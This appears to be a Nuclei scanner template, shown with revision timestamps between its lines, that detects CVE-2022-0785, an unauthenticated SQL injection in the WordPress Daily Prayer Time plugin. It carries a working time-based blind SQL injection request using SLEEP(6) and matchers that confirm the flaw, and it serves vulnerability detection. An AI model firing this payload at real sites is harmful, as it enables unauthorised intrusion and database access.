2022-11-08 12:51:06 +00:00
id : CVE-2022-0785
info :
2022-12-09 21:40:18 +00:00
name : WordPress Daily Prayer Time <2022.03.01 - SQL Injection
2022-11-08 12:51:06 +00:00
author : theamanrawat
severity : critical
description : |
2022-12-09 21:40:18 +00:00
WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.
2022-11-08 12:51:06 +00:00
reference :
- https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
- https://wordpress.org/plugins/daily-prayer-time-for-mosques/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0785
classification :
2022-11-09 19:50:02 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-11-08 12:51:06 +00:00
cve-id : CVE-2022-0785
2022-11-09 19:50:02 +00:00
cwe-id : CWE-89
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:daily_prayer_time_project:daily_prayer_time:*:*:*:*:*:*:*:*
epss-score : 0.01364
2022-11-08 12:51:06 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2022-11-09 19:50:02 +00:00
tags : sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,cve,cve2022,wp
2022-11-08 12:51:06 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-11-08 12:51:06 +00:00
- raw :
- |
@timeout : 10s
2022-11-09 13:15:57 +00:00
GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1
2022-11-08 12:51:06 +00:00
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "dptTimetable customStyles dptUserStyles")'
2022-11-09 13:15:57 +00:00
condition : and